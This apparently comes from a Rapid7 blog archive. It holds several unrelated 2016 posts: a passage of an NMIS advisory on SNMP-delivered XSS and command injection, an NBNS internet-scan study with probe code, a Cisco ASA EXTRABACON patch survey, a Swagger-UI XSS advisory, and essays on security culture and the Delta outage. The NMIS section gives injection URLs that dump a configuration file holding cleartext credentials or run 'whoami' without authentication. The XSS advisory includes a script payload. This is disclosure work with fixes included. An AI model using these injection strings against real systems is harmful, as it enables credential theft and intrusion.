The example configuration for Net-SNMP's snmptrapd <nmisdir>/install/snmptrapd.conf, which ships with NMIS, contains the line "disableAuthorization yes." This directive disables access control checks and accepts all incoming notifications. The affected software is capable of accepting traps from hosts registered or unknown to the system. The stored XSS payload is delivered to the affected software via an object in the malicious SNMP trap. Once the trap is processed it is stored in the SNMP Traps Log. The XSS payload will execute when the user navigates to the SNMP Traps Log widget by clicking on the Service Desk > Logs > Log List menu item, and then clicking the SNMP_Traps link in the List of Available Logs window that appears. The user may also navigate to the non-widget SNMP Traps Log page at http://host:port/cgi-nmis8/logs.pl?conf=Config.nmis&act=log_file_view&logname=SNMP_Traps&widget=false.

om-figure1.png

 

R7-2016-14.2, XSS Injection via SNMP Agent Responses (CVE-2016-5642)

Second, a stored server XSS vulnerability exists due to insufficient filtering of SNMP agent supplied data before the affected software stores and displays the data. The stored XSS payload is delivered to the affected software during the SNMP data collect operation performed when adding and updating a node. The malicious node utilizes an SNMP agent to supply the desired XSS payload in response to SNMP GetRequest messages for the sysDescr (1.3.6.1.2.1.1.1), sysContact (1.3.6.1.2.1.1.4) and sysLocation (1.3.6.1.2.1.1.6) object identifiers (OIDs). The XSS payload provided for the sysDescr object will execute when the add and update node operation is complete and the results are displayed.

 

The XSS payload provided for the sysLocation object will execute when the user clicks the Network Status > Network Metrics and Health menu item and then clicks on the link for the malicious node's group. After the Node List and Status window appears, if the user clicks on the link for the malicious node the XSS payload for the sysLocation, sysContact and sysDescr objects execute before the Node Details window appears. If the user keeps the malicious node's Node Details window open it updates at a set interval causing all three XSS payloads to execute repeatedly.

om-figure2.png

 

R7-2016-14.3, Reflected XSS Injection via SNMP Agent Responses (CVE-2016-5642)

Third, a reflected (AKA Non-Persistent or Type II) client XSS vulnerability exists due to insufficient filtering of SNMP agent supplied data before the affected software displays the data. The reflected XSS payload is delivered to the affected software during the SNMP Tool walk operation. Any XSS payloads contained in walked OIDs will execute when the results are displayed. Note, the SNMP Tool is not available in NMIS version 4.3.6f.

om-figure4.png

 

R7-2016-14.4, Web Application Command Injection (CVE-2016-6534)

Finally, a command injection vulnerability in the web application component of Opmantek Network Management Information System (NMIS) exists due to insufficient input validation. In NMIS version 8.5.10G the command injection vulnerability exists in the tools.pl CGI script via the "node" parameter when the "act" parameter is set to "tool_system_finger". The user must be authenticated and granted the tls_finger permission, which does not appear to be enabled by default. However, the software is vulnerable if the tls_finger permission is granted to the authenticated user in the <NMIS Install Directory>/conf/Access.nmis file. A sample tls_finger permission is defined as follows:

 

'tls_finger' => {
    'descr' => 'Permit Access tool finger',
    'group' => 'access',
    'level0' => '1',
    'level1' => '0',
    'level2' => '1',
    'level3' => '1',
    'level4' => '1',
    'level5' => '0',
    'name' => 'tls_finger'
  }

 

In NMIS version 4.3.6f the command injection vulnerability exists in the admin.pl CGI script via the "node" parameter when the "admin" parameter is set to either "man", "finger", "ping", "trace" or "nslookup". This is exploitable without authentication in the default configuration, since NMIS authentication is not required by default as specified in the <NMIS Install Directory>/conf/nmis.conf file.

 

#authentication stuff
#
# set this to true to require authentication (default=false)
auth_require=false

 

NMIS version 8.5.10G Exploitation

An authenticated user that has been granted the tls_finger permission requests the URL http://host:port/cgi-nmis8/tools.pl?conf=Config.nmis&act=tool_system_finger&node=%3Bcat%20%2Fusr%2Flocal%2Fnmis8%2Fconf%2FConfig.nmis to dump the NMIS configuration file, which contains cleartext usernames and passwords for the outgoing notification mail server and the NMIS database server, as shown below.

om-figure5.png

 

NMIS version 4.3.6f Exploitation

An unauthenticated individual with access to the NMIS server requests the URL http://host:port/cgi-nmis4/admin.pl?admin=finger&node=%3Bwhoami to output the user name associated with the effective user ID of the web server process, as shown below.

 

om-figure6.png
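
The root cause in both versions is the same class of bug: a request parameter flows into a shell command. As a general illustration of the fix (sketched here in Python rather than the NMIS Perl code), validate the node parameter against a strict pattern and avoid shell interpolation entirely:

# Illustrative sketch (not the actual NMIS code): validate the "node" parameter and
# avoid shell interpolation so payloads like ";whoami" cannot execute.
import re
import subprocess

HOSTNAME = re.compile(r"^[A-Za-z0-9._-]{1,253}$")

def finger_node(node):
    if not HOSTNAME.match(node):
        raise ValueError("invalid node name: %r" % node)
    # Passing a list (no shell=True) means the argument is never parsed by a shell.
    return subprocess.run(["finger", "@" + node], capture_output=True, text=True).stdout

# finger_node(";cat /usr/local/nmis8/conf/Config.nmis")  -> raises ValueError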

 

Disclosure Timeline

Wed, Jun 01, 2016: Initial contact to vendor

Thu, Jun 02, 2016: Vendor responded with security contact

Thu, Jun 02, 2016: Details provided to vendor security contact

Mon, Jun 13, 2016: Versions 4.3.7c and NMIS 8.5.12G released by the vendor

Wed, Jun 22, 2016: Disclosed to CERT, tracked as VR-228

Wed, Jun 22, 2016: CVE-2016-5642 assigned by CERT

Tue, Sep 06, 2016: CVE-2016-6534 assigned by CERT

Wed, Sep 07, 2016: Public disclosure

 

More Information for All Issues

All of these described issues have been fixed by their respective vendors, so users are encouraged to update to the latest versions. For a more in-depth exploration of the SNMP-vectored issues, readers are encouraged to download the accompanying paper, From Managed to Mangled: SNMP Exploits for Network Management Systems.

For the past several years, Rapid7's Project Sonar has been performing studies that explore the exposure of the NetBIOS name service on the public IPv4 Internet.  This post serves to describe the particulars behind the study and provide tools and data for future research in this area.

 

Protocol Overview

Originally conceived in the early 1980s, NetBIOS is a collection of services that allows applications running on different nodes to communicate over a network.  Over time, NetBIOS was adapted to operate on various network types including IBM's PC Network, token ring, Microsoft's MS-Net, Novell NetWare IPX/SPX, and ultimately TCP/IP.


For purposes of this document, we will be discussing NetBIOS over TCP/IP (NBT), documented in RFC 1001 and RFC 1002.

 

NBT is comprised of three services:

 

  • A name service for name resolution and registration (137/UDP and 137/TCP)
  • A datagram service for connectionless communication (138/UDP)
  • A session service for session-oriented communication (139/TCP)

 

The UDP variant of the NetBIOS over TCP/IP Name service on 137/UDP, NBNS, sometimes referred to as WINS (Windows Internet Name Service), is the focus of this study.  NBNS provides services related to NetBIOS names for NetBIOS-enabled nodes and applications.  The core functionality of NBNS includes name querying and registration capabilities and is similar in functionality and on-the-wire format to DNS but with several NetBIOS/NBNS specific details.

 

Although NetBIOS (and, in turn, NBNS) are predominantly spoken by Microsoft Windows systems, it is also very common to find this service active on OS X systems (netbiosd and/or Samba), Linux/UNIX systems (Samba) and all manner of printers, scanners, multi-function devices, storage devices, etc.  Fire up wireshark or tcpdump on nearly any network that contains or regularly services Windows systems and you will almost certainly see NBNS traffic everywhere:

 

Screen Shot 2016-09-01 at 12.16.27 PM.png

 

The history of security issues with NBNS reads much like that of DNS.  Unauthenticated and communicated over a connectionless medium, some attacks against NBNS include:

 

  • Information disclosure relating to generally internal/private names and addresses
  • Name spoofing, interception, and cache poisoning.

 

While not exhaustive, some notable security issues relating to NBNS include:

 

  • Abusing NBNS to attack the Web Proxy Auto-Discovery (WPAD) feature of Microsoft Windows to perform man-in-the-middle attacks, resulting in MS09-008/CVE-2009-0094.
  • Hot Potato, which leveraged WPAD abuse via NBNS in combination with other techniques to achieve privilege escalation on Windows 7 and above.
  • BadTunnel, which utilized NetBIOS/NBNS in new ways to perform man-in-the-middle attacks against target Windows systems, ultimately resulting in Microsoft issuing MS16-077.
  • Abusing NBNS to perform amplification attacks as seen during DDoS attacks as warned by US-CERT's TA14-017a.

 

 

Study Overview

Project Sonar's study of NBNS on 137/UDP has been running for a little over two years as of the publication of this document.  For the first year the study ran once per week, but shortly thereafter it was changed to run once per month along with the other UDP studies in an effort to reduce the signal to noise ratio.

 

The study uses a single, static, 50-byte NetBIOS "node status request" (NBSTAT) probe with a wildcard (*) scope that will return all configured names for the target NetBIOS-enabled node.  A name in this case is in reference to a particular capability a NetBIOS-enabled node has -- for example, this could (and often does) include the configured host name of the system, the workgroup/domain that it belongs to, and more.  In some cases, the presence of a particular type of name can be an indicator of the types of services a node provides.  For a more complete list of the types of names that can be seen in NBNS, see Microsoft's documentation on NetBIOS suffixes.

 

The probe used by Sonar is identical to the probe used by zmap and the probe used by Nmap.  A Wireshark-decoded sample of this probe can be seen below:

 

nbns_nbstat_request.png
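
For readers who want to reproduce the probe themselves, below is a minimal Python sketch that builds and sends an equivalent 50-byte NBSTAT request (the target address is a placeholder, and of course you should only probe hosts you are authorized to scan):

# Minimal sketch: build and send the 50-byte NetBIOS "node status" (NBSTAT) probe
# described above. Only scan hosts/networks you are authorized to probe.
import socket
import struct

def encode_netbios_name(name):
    """First-level encoding: pad to 16 bytes, split each byte into nibbles + 'A'."""
    padded = name.ljust(16, "\x00")
    encoded = "".join(chr((ord(c) >> 4) + 0x41) + chr((ord(c) & 0x0F) + 0x41) for c in padded)
    return b"\x20" + encoded.encode("ascii") + b"\x00"   # length byte + name + terminator

def build_nbstat_probe(txid=0x1337):
    header = struct.pack(">HHHHHH", txid, 0x0010, 1, 0, 0, 0)   # flags: broadcast bit set
    question = encode_netbios_name("*") + struct.pack(">HH", 0x0021, 0x0001)  # NBSTAT, IN
    return header + question

probe = build_nbstat_probe()
assert len(probe) == 50

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)
sock.sendto(probe, ("192.168.0.10", 137))   # placeholder target
try:
    data, addr = sock.recvfrom(4096)
    print("%s answered with %d bytes" % (addr[0], len(data)))
except socket.timeout:
    print("no response")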

 

This probe is sent to all public IPv4 addresses, excluding any networks that have requested removal from Sonar's studies, leaving ~3.6b possible target addresses for Sonar.  All responses, NBNS or otherwise, are saved.  Responses that appear to be legitimate NBNS responses are decoded for further analysis.

 

An example response from a Windows 2012 system:

 

nbns_nbstat_response.png

 

As a bonus for reconnaissance efforts, RFC 1002 also describes a statistics field at the end of the node status response containing information about the NetBIOS service on the target node, and one field within it, the "Unit ID", frequently contains the Ethernet or other MAC address.

 

NetBIOS, and in particular NBNS, falls into the same bucket that many other services fall into -- they have no sufficiently valid business reason for being exposed live on the public Internet.  Lacking authentication and riding on top of a connectionless protocol, NBNS has a history of vulnerabilities and effective attacks that can put systems and networks exposing/using this service at risk.  Depending on your level of paranoia, the information disclosed by a listening NBNS endpoint may also constitute a risk.

 

These reasons, combined with a simple, non-intrusive way of identifying NBNS endpoints on the public IPv4 Internet, are why Rapid7's Project Sonar decided to undertake this study.

 

 

Data, Tools and Future Research

As part of Rapid7's Project Sonar, all data collected by this NBNS study is shared with the larger security community thanks to scans.io. The past two years' worth of the NBNS study's data can be found here with the -netbios-137.csv.gz suffix. The data is stored as GZIP-compressed CSV, with each row containing the metadata for the response elicited by the NBNS probe -- timestamp, source and destination IPv4 address, port, IP ID, TTL and, most importantly, the NBNS response (hex encoded).

 

There are numerous ways one could start analyzing this data, but internally we do much of our first-pass analysis using GNU parallel and Rapid7's dap.  Below is an example command you could run to start your own analysis of this data.  It utilizes dap to parse the CSV, decode the NBNS response and return the data in a more friendly JSON format:

 

pigz -dc ~/Downloads/20160801-netbios-137.csv.gz | parallel --gnu --pipe "dap csv + select 2 8 + rename 2=ip 8=data + transform data=hexdecode + decode_netbios_status_reply data + remove data + json"

 

As an example of some of the output you might get from this, anonymized for now:

 

{"ip":"192.168.0.1","data.netbios_names":"MYSTORAGE:00:U WORKGROUP:00:G MYSTORAGE:20:U WORKGROUP:1d:U ","data.netbios_mac":"e5:d8:00:21:10:20","data.netbios_hname":"MYSTORAGE","data.netbios_mac_company":"UNKNOWN","data.netbios_mac_company_name":"UNKNOWN"}
{"ip":"192.168.0.2","data.netbios_names":"OFFICE-PC:00:U OFFICE-PC:20:U WORKGROUP:00:G WORKGROUP:1e:G WORKGROUP:1d:U \u0001\u0002__MSBROWSE__\u0002:01:G ","data.netbios_mac":"00:1e:10:1f:8f:ab","data.netbios_hname":"OFFICE-PC","data.netbios_mac_company":"Shenzhen","data.netbios_mac_company_name":"ShenZhen Huawei Communication Technologies Co.,Ltd."}
{"ip":"192.168.0.3","data.netbios_names":"DSL_ROUTE:00:U DSL_ROUTE:03:U DSL_ROUTE:20:U \u0001\u0002__MSBROWSE__\u0002:01:G WORKGROUP:1d:U WORKGROUP:1e:G WORKGROUP:00:G ","data.netbios_mac":"00:00:00:00:00:00","data.netbios_hname":"DSL_ROUTE"}
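
As a trivial first pass over that JSON output, a short script like the one below (assuming the pipeline's output has been redirected to a hypothetical netbios.json file, one JSON object per line) can tally workgroup names and count responses that leak a MAC address in the Unit ID:

# Sketch: first-pass summary of the dap JSON output above (one JSON object per line).
# The file name is a placeholder; field names are as shown in the sample output.
import json
from collections import Counter

workgroups = Counter()
macs_leaked = 0
total = 0

with open("netbios.json") as fh:
    for line in fh:
        rec = json.loads(line)
        total += 1
        # Each entry in netbios_names looks like "NAME:suffix:type"; group (G) entries
        # with suffix 00 are typically workgroup/domain names.
        for entry in rec.get("data.netbios_names", "").split():
            if entry.count(":") < 2:
                continue
            name, suffix, kind = entry.rsplit(":", 2)
            if kind == "G" and suffix == "00":
                workgroups[name] += 1
        if rec.get("data.netbios_mac", "00:00:00:00:00:00") != "00:00:00:00:00:00":
            macs_leaked += 1

print("responses parsed:       ", total)
print("Unit IDs leaking a MAC: ", macs_leaked)
print("most common workgroups: ", workgroups.most_common(5))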

 

There are also several Metasploit modules for exploring/exploiting NBNS in various ways:

 

  • auxiliary/scanner/netbios/nbname: performs the same initial probe as the Sonar study against one or more targets but uses the NetBIOS name of the target to perform a follow-up query that will disclose the IPv4 address(es) of the target.  Useful in situations where the target is behind NAT, multi-homed, etc., and this information can potentially be used in future attacks or reconnaissance.
  • auxiliary/admin/netbios/netbios_spoof: attempts to spoof a given NetBIOS name (such as WPAD) targeted against a specific system
  • auxiliary/spoof/nbns/nbns_response: similar to netbios_spoof but listens for all NBNS requests broadcast on the local network and will attempt to spoof all names (or just a subset by way of regular expressions)
  • auxiliary/server/netbios_spoof_nat: used to exploit BadTunnel

 

For a protocol that has been around for over 30 years and has had its fair share of research done against it, one might think that there is no more to be discovered, but the discovery of two high profile vulnerabilities in NBNS this year (HotPotato and BadTunnel) shows that there is absolutely more to be had.

 

If you are curious about NBNS and interested in exploring more, use the data, tools and knowledge provided above.  We'd love to hear your ideas or discoveries either here in the comments or by emailing research@rapid7.com.

 

Enjoy!

by Derek Abdine & Bob Rudis (photo CC-BY-SA Kalle Gustafsson)

 

Astute readers will no doubt remember the Shadow Brokers leak of the Equation Group exploit kits and hacking tools back in mid-August. More recently, security researchers at SilentSignal noted that it was possible to modify the EXTRABACON exploit from the initial dump to work on newer Cisco ASA (Adaptive Security Appliance) devices, meaning that virtually all ASA devices (8.x to 9.2(4)) are vulnerable. We thought it would be interesting to dig into the vulnerability a bit more from a different perspective.

 

Now, "vulnerable" is an interesting word to use since:

 

  • the ASA device must have SNMP enabled and an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP though it's rare to see it working that way) and know the SNMP community string
  • an attacker must also have telnet or SSH access to the devices

 

This generally makes the EXTRABACON attack something that would occur within an organization's network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit. Even though there's a high probable loss magnitude1 from a successful exploit, the threat capability2 and threat event frequency3 for attacks would most likely be low in the vast majority of organizations that use these devices to secure their environments. Having said that, EXTRABACON is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organizations to deploy the patch as soon as they can obtain and test it.

 

Cisco did an admirable job responding to the exploit release and has a patch ready for organizations to deploy. We here at Rapid7 Labs wanted to see if it was possible to both identify externally facing Cisco ASA devices and see how many of those devices were still unpatched. Unfortunately, most firewalls aren't going to have their administrative interfaces hanging off the public internet nor are they likely to have telnet, SSH or SNMP enabled from the internet. So, we set our sights on using Project Sonar to identify ASA devices with SSL/IPsec VPN services enabled since:

 

  • users generally access corporate VPNs over the internet (so we will be able to see them)
  • many organizations deploy SSL VPNs these days instead of, or in addition to, IPsec (or other) VPNs (and, we capture all SSL sites on the internet via Project Sonar)
  • these SSL VPN-enabled Cisco ASAs are easily identified

 

We found over 50,000 Cisco ASA SSL VPN devices in our most recent SSL scan. Keeping with the spirit of our recent National Exposure research, here's a breakdown of the top 20 countries:

 

Table 1: Device Counts by Country

Country               Device count        %
United States               25,644    50.9%
Germany                      3,115     6.2%
United Kingdom               2,597     5.2%
Canada                       1,994     4.0%
Japan                        1,774     3.5%
Netherlands                  1,310     2.6%
Sweden                       1,095     2.2%
Australia                    1,083     2.2%
Denmark                      1,026     2.0%
Italy                          991     2.0%
Russian Federation             834     1.7%
France                         777     1.5%
Switzerland                    603     1.2%
China                          535     1.1%
Austria                        497     1.0%
Norway                         448     0.9%
Poland                         410     0.8%
Finland                        404     0.8%
Czech Republic                 396     0.8%
Spain                          289     0.6%

 

Because these are SSL VPN devices, we also have access to the certificates that organizations used to ensure confidentiality and integrity of the communications. Most organizations have one or two (higher availability) VPN devices deployed, but many must deploy significantly more devices for geographic coverage or capacity needs:

 

figure_01-1.png

 

Table 2: List of organizations with ten or more VPN ASA devices

Organization                                        Count
Large Japanese telecom provider                        55
Large U.S. multinational technology company            23
Large U.S. health care provider                        20
Large Vietnamese financial services company            18
Large Global utilities service provider                18
Large U.K. financial services company                  16
Large Canadian university                              16
Large Global talent management service provider        15
Large Global consulting company                        14
Large French multinational manufacturer                13
Large Brazilian telecom provider                       12
Large Swedish technology services company              12
Large U.S. database systems provider                   11
Large U.S. health insurance provider                   11
Large U.K. government agency                           10

 

So What?

 

The above data is somewhat interesting on its own, but what we really wanted to know is how many of these devices had not been patched yet (meaning that they are technically vulnerable if an attacker is in the right network position). Remember, it's unlikely these organizations have telnet, SSH and SNMP enabled to the internet, and researchers in most countries, including those of us here in the United States, are not legally allowed to make credentialed scan attempts on these services without permission. Directly testing for SNMP and telnet/SSH access would have let us identify truly vulnerable systems, but that was not an option. After some bantering with the extended team (Brent Cook, Tom Sellers & jhart) and testing against a few known devices, we decided to use hping to determine device uptime from TCP timestamps and see how many devices had been rebooted since the release of the original exploits on (roughly) August 15, 2016. We modified our Sonar environment to enable hping studies and then ran the uptime scan across the target device IP list on August 26, 2016, so any system reporting an uptime greater than 12 days has not been rebooted since the exploit release (or is employing some serious timestamp masking techniques) and is technically still vulnerable. Also remember that organizations who thought their shiny new ASA devices weren't vulnerable became vulnerable after the August 25, 2016 SilentSignal blog post (meaning that if it seemed reasonable not to patch and reboot before, it stopped being reasonable on August 25).
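For readers who want to see the idea rather than reproduce our exact methodology, here is a rough sketch of TCP-timestamp uptime estimation using scapy (an assumption; the actual study used hping through Sonar). The 100 Hz tick rate is also an assumption, common on network gear but platform-dependent, so treat the output as an approximation; sending raw packets requires root privileges.

#!/usr/bin/env python
# Rough sketch of TCP-timestamp uptime estimation (not our production tooling).
from scapy.all import IP, TCP, sr1

def approx_uptime_days(host, port=443, hz=100):
    """Estimate days since reboot from the peer's TCP timestamp value."""
    syn = IP(dst=host) / TCP(dport=port, flags="S",
                             options=[("Timestamp", (0, 0))])
    reply = sr1(syn, timeout=2, verbose=False)
    if reply is None or not reply.haslayer(TCP):
        return None
    for name, value in reply[TCP].options:
        if name == "Timestamp":
            return value[0] / hz / 86400.0   # tsval ticks -> days
    return None  # timestamps disabled, stripped, or masked

if __name__ == "__main__":
    print(approx_uptime_days("192.0.2.1"))  # placeholder target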

 

So, how many of these organizations patched & rebooted? Well, nearly 12,000 (~24%) of them prevented us from capturing the timestamps. Of the remaining ones, here's how their patch status looks:

 

[Figure 2: patch status (rebooted vs. not rebooted since the exploit release) of the externally visible Cisco ASA SSL VPN devices]

We can look at the distribution of uptime in a different way with a histogram, making 6-day buckets (so we can more easily see "Day 12"):

 

[Figure 3: histogram of device uptime in 6-day buckets]

 

This also shows the weekly patch/reboot cadence that many organizations employ.

 

Let's go back to our organization list and see what the mean uptime (time since last reboot) is for each:

 

Table 3: hping Scan results (2016-08-26)

Organization                                        Count    Mean uptime (days)
Large Japanese telecom provider                        55                    33
Large U.S. multinational technology company            23                    27
Large U.S. health care provider                        20                    47
Large Vietnamese financial services company            18                     5
Large Global utilities service provider                18                    40
Large U.K. financial services company                  16                    14
Large Canadian university                              16                    21
Large Global talent management service provider        15           Unavailable
Large Global consulting company                        14                    21
Large French multinational manufacturer                13                    34
Large Brazilian telecom provider                       12                    23
Large Swedish technology services company              12                     4
Large U.S. database systems provider                   11                    25
Large U.S. health insurance provider                   11           Unavailable
Large U.K. government agency                           10                    40

 

Two had no uptime data available and two had rebooted/likely patched since the original exploit release.

Fin

 

We re-ran the uptime scan after the close of the following weekend (organizations may have waited until the weekend to patch/reboot after the latest exploit news) and here's how our list looked:

 

Table 4: hping Scan Results (2016-08-29)

Organization                                        Count    Mean uptime (days)
Large Japanese telecom provider                        55                    38
Large U.S. multinational technology company            23                    31
Large U.S. health care provider                        20                     2
Large Vietnamese financial services company            18                     9
Large Global utilities service provider                18                    44
Large U.K. financial services company                  16                    18
Large Canadian university                              16                    26
Large Global talent management service provider        15           Unavailable
Large Global consulting company                        14                    25
Large French multinational manufacturer                13                    38
Large Brazilian telecom provider                       12                    28
Large Swedish technology services company              12                     8
Large U.S. database systems provider                   11                    26
Large U.S. health insurance provider                   11           Unavailable
Large U.K. government agency                           10                    39

 

Only one additional organization from our "top" list (the large U.S. health care provider) rebooted and likely patched since the previous scan, but an additional 4,667 devices from the full data set were rebooted (likely patched).

 

This bird's eye view of how organizations have reacted to the initial and updated EXTRABACON exploit releases shows that some appear to have assessed the issue as serious enough to react quickly while others have moved a bit more cautiously. It’s important to stress, once again, that attackers need to have far more than external SSL access to exploit these systems. However, also note that the vulnerability is very real and impacts a wide array of Cisco devices beyond these SSL VPNs. So, while you may have assessed this as a low risk, it should not be forgotten and you may want to ensure you have the most up-to-date inventory of what Cisco ASA devices you are using, where they are located and the security configurations on the network segments with access to them.

 

We only looked at a small, externally visible fraction of these devices and found that just 38% of them have likely been patched. We're eager to hear how organizations assessed this vulnerability disclosure in order to make the update/no-update decision. So, if you're brave, drop a note in the comments or feel free to send a note to research@rapid7.com (all replies to that e-mail will be kept confidential).

 


[1], [2], [3]: Open FAIR Risk Taxonomy [PDF]

Parameters within a Swagger document are insecurely loaded into the browser-based documentation that Swagger-UI generates. Persistent XSS occurs when this documentation is then hosted on a public site. This issue was resolved in Swagger-UI 2.2.1.

Summary

One of the components used to build the interactive documentation portion of the Swagger ecosystem is Swagger-UI. This interface generates dynamic documentation, based on a referenced Swagger document, that can interact with the referenced API. If the Swagger document itself contains XSS payloads, the Swagger-UI component can be tricked into injecting unescaped content into the DOM.

Product Description

From the README at https://github.com/swagger-api/swagger-ui

"Swagger UI is part of the Swagger project. The Swagger project allows you to produce, visualize and consume your own RESTful services. No proxy or 3rd party services required. Do it your own way.

Swagger UI is a dependency-free collection of HTML, Javascript, and CSS assets that dynamically generate beautiful documentation and sandbox from a Swagger-compliant API. Because Swagger UI has no dependencies, you can host it in any server environment, or on your local machine."

Swagger UI parses a chosen Swagger file and generates dynamic, colorful documentation that enables users to interact with a RESTful API.

Credit

Scott Lee Davis, scott_davis@rapid7.com, Application Security Researcher, Rapid7

Exploitation

 

If a Swagger file contains, in its definitions section, a default value carrying an XSS payload, that value can be loaded unescaped into the DOM. For example:

 

 

Definitions
  Type: string
  Description: prints xss
  Default: <script>console.log('000000000000000000dad0000000000000000000');</script>
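For illustration, a minimal and entirely hypothetical Swagger 2.0 document carrying such a payload could be generated as sketched below; the definition name, payload, and output file name are made up, and pre-2.2.1 versions of Swagger-UI would render the default value unescaped.

import json

# Hypothetical minimal Swagger 2.0 document whose "definitions" entry carries
# markup in its default value. Names and file name are illustrative only.
malicious_spec = {
    "swagger": "2.0",
    "info": {"title": "xss-demo", "version": "1.0"},
    "paths": {},
    "definitions": {
        "Demo": {
            "type": "string",
            "description": "prints xss",
            "default": "<script>console.log('xss')</script>",
        }
    },
}

with open("xss-demo-swagger.json", "w") as fh:
    json.dump(malicious_spec, fh, indent=2)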



Mitigations

Sanitization of HTML content should be done by an engine built for the job. The Swagger-UI team chose to solve this issue with the npm module sanitize-html.

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Thu, Jun 09, 2016: Discovery by Scott Lee Davis of Rapid7, Inc.
  • Fri, Jun 17, 2016: Attempted to contact the vendor
  • Mon, Jul 11, 2016: Disclosed details to the vendor at security@swagger.io
  • Wed, Jul 27, 2016: Disclosed details to CERT as VR-316
  • Tue, Aug 09, 2016: CVE-2016-5682 assigned by CERT
  • Tue, Aug 23, 2016: Fixed in Swagger-UI 2.2.1
  • Fri, Sep 02, 2016: Public disclosure

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

When it comes to being successful in security, you must master the ability to “sell” what you’re doing. You must sell new security initiatives to executive management. You must sell security policies and controls to users. You even have to sell your customers and business partners on what you’re doing to minimize information risks. This selling is made up of various components including credibility and self-confidence, direct involvement with the business, and demonstrating the ongoing value of what you’re doing.

 

There’s one aspect of selling, however, that’s often unknown or forgotten in the interest of expediency – checking boxes and getting things done yesterday – all bad ways to go about doing things in security. The missing link is patience, or the lack thereof. Sales expert Jeffrey Gitomer said that people don’t like to be sold but they love to buy. In other words, they don’t want things forced on them, but instead, they want to be in control of the decision-making process. When an idea becomes familiar – in a casual manner – it becomes better understood. It’s most certainly less threatening. People will only buy into your ideas when they’re convinced that you’re on their side. There's a little trick you can use when you present new ideas in the process of selling security to others: do it casually for future consideration.

 

Psychologists say that people need about 72 hours to absorb new ideas. So, regardless of the subject matter or how urgent you think your issue is, an idea that you present casually and without pressure will get more consideration and better acceptance over the long term. It seems like a no-brainer, but it's rarely put into practice. When it comes to security, everything is urgent: assessments and audits, technical controls, training programs and even policy-related issues. There's always a fire to put out.

 

Your job as the person in charge of security is to start thinking about how you can slowly get the right people on board with what you’re trying to accomplish. Start today sharing your thoughts, ideas, and goals with management. Talk to your users about what you’re doing to not only improve security but also make their jobs easier. Plant the seeds. Let things simmer. Whatever you do, don’t force security on others. Think long-term. U.S. Navy admiral Hyman Rickover once said “Good ideas are not adopted automatically. They must be driven into practice with courageous patience." Let this approach help drive your security program. You’ll not only build better relationships but you’ll have a much better chance of getting things done. That’s the sign of a true information security leader.

In case you haven't yet met someone from Rapid7, you should know that we care about improving security at all companies. We have no interest in selling you products that are going to sit on your shelf, so I recently wore makeup for the first time and sat down for a live videocast with Sara Peters from Dark Reading and John Pironti from IP Architects to talk through how organizations can get their people, process, and technology working together to prioritize and respond to security threats in real time.

 

So what did we discuss? Somehow, I didn't black out like Frank the Tank in the all-important debate to save the frat, so I remember three major themes we hadn't really planned prior to the cameras starting to roll: preparation, being realistic, and data vs. intelligence.

 

What do I mean by this? Well, I hate watching myself on video, so I'll paraphrase from memory:

 

Preparation

No security team, no matter the skill level, can be dropped into a new organization and start responding to threats in real time. There needs to be a great deal of attention to the basics of security hygiene, getting buy-in from leadership on the approach, and operating according to plan. No technology is going to solve this for us; the team of IT, InfoSec, and Risk stakeholders need to develop playbooks as a group, test themselves as a group, and develop the level of trust in each other necessary to take action right as problems arise. The "test themselves as a group" part is rarely done, but might be the most valuable piece for improving overall effectiveness.

 

Being realistic

Multiple times in our discussion, we brought up scenarios that are unrealistic for most businesses. Should you be worried about nation-state attacks? Do you need to protect against Stuxnet? Do you need to rush to protect yourself against the latest zero-day with a logo and a catchy name? The answer to all three of these questions is: most likely not. Your focus should first be on defending the assets at the core of your business against the opportunistic attacks that use well-known exploits. Additionally, if you aren't involved in helping the organization adopt the latest technologies that make it productive, they are going to be adopted anyway - just not in a secure fashion.

 

Data vs. intelligence

The idea that data needs context to become information, and needs to be relevant to you to actually constitute intelligence, has been a common discussion topic at Rapid7 lately. We all agreed that a list of IP addresses from an unknown source is not threat intelligence, and an organization's logs and other machine data are no different on their own. Your goal should be to get the right information to your team, not simply access to all of the data.

 

To watch the full video on-demand, even if only to get blackmail screen grabs of me in makeup, check it out here:

Prioritizing And Responding To Security Threats In Real Time - Webcast - 2016-08-16 13:00:00 EDT

 

If you want to learn more about the various ways Rapid7 can help your business, our Advisory Services are often a good place to start.

...and then it might be too late.

 

 

Recently, Delta Airlines suffered a weeklong outage that, if you take it at face value, ticks just about every box in a security person's disaster recovery planning scenario.

 

Delta has given multiple interviews on what happened. Although details are still being pieced together, essentially the company had a power issue, and when it tried to go to backup systems, they had failures. I managed a data center for several years, and this is what keeps data center managers up at night: the what-if-it-doesn't-come-back-up scenario.

 

The outage cost Delta millions of dollars in recovery effort, including vouchers given to customers who were inconvenienced. It severely impacted travelers through hundreds of cancelled flights, and Delta likely suffered some reputational damage as well.

 

Hindsight being 20/20, this scenario can be avoided, or at the very least have its impact reduced, with good risk management, but that takes awareness, resources, and buy-in from top management. Ed Bastian, the CEO of Delta, has taken personal responsibility for the failure. We can expect significant internal review of the disaster preparedness scenarios their IT teams are involved in.

 

Business continuity and disaster recovery are also a security professional's concern, touching the CIA triad's most demanding principle: Availability. Availability means that information is available to users when they need it, and it can take many different forms depending on the business context. Delta, as a company which operates 24x7x365, relies on availability, and any impact to it also impacts the timing of fleet operations. Even minor disruptions cause cascades which severely and adversely affect the business. This sensitivity to availability is one reason it took so long for Delta to fully recover; the longer they stayed down, the more the problem was amplified.

 

"The system moved to backup power but not all the servers were connected to it," Bastian told the WSJ.

 

Documentation is a key to all disaster planning. You have to understand in your disaster recovery (DR) plan what will and will not be part of your backup system. It is very expensive to maintain a full replica of your systems, so your DR plan might account for only a partial recovery. The business risk of a partial recovery must be documented and communicated so everyone understands what will happen in a disaster scenario. Bastian commented "We did not believe, by any means, that we had this kind of vulnerability."

 

